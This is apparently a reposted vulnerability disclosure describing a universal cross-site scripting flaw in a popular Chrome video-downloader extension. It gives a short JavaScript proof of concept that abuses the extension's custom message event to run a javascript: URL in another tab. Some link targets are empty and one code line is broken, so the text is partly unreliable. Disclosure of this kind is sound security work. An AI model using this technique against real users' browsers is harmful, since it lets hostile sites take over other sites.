Video Downloader Universal Cross Site Scripting

The Video Downloader Chrome extension suffers from a universal cross site scripting vulnerability.

MD5 | 7773a2a48a1659869a5f513b21355dfb

Video Downloader Extension: Universal XSS 

Browsing through the list of most popular Chrome extensions, I noticed this extension with 4M users:

<a href="" title="" class="" rel="nofollow"></a>

It has a pretty obvious universal XSS (i.e. it effectively lets any site take over any other site).

Any website can do this:

// Change the active tab"");

// Run code in the new tab
setTimeout('document.dispatchEvent(new CustomEvent("link64_msgAddLinks", {detail: {type: "__L64_NAVIGATE_CHROME_URL", url: "javascript:alert(document.title);window.close()"}}))', 1000);

That will run arbitrary code on <a href="" title="" class="" rel="nofollow"></a>.

I reported this bug to the cws team.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

Found by: taviso

Related Posts